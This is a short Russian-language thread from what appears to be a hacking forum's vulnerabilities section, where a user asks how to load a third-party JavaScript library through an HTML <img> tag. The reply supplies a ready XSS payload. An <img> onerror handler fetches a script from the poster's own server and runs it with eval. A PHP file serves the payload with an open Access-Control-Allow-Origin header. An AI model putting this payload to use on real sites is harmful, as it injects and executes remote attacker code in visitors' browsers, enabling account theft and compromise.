Подключение JS библиотеки через тег <img>

Discussion in 'Уязвимости' started by iGermi, 21 Jul 2018.

  1. iGermi

    iGermi New Member

    Joined:
    11 Aug 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Здраствуйте, форум. Интересует возможность подключения сторонней JS библиотеки используя html тег <img>. Кто подскажет.
     
  2. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    106
    Likes Received:
    128
    Reputations:
    46
    HTML:
    <img src="unexistent.jpg" onerror="xhr=new XMLHttpRequest();xhr.open('GET','https:/host/script.php',false);xhr.send();payload=xhr.responseText;eval(payload)">
    где host - твой сервак на котором лежат 2 файла:script.php и payload.js
    содержимое script.php:
    PHP:
    <?php

    header
    ("Access-Control-Allow-Origin: *");
    echo 
    file_get_contents("payload.js");

    ?>
    подгружаем код через php потому, что для кроссдоменных запросов от сервера должен приходить заголовок Access-Control-Allow-Origin
     
Loading...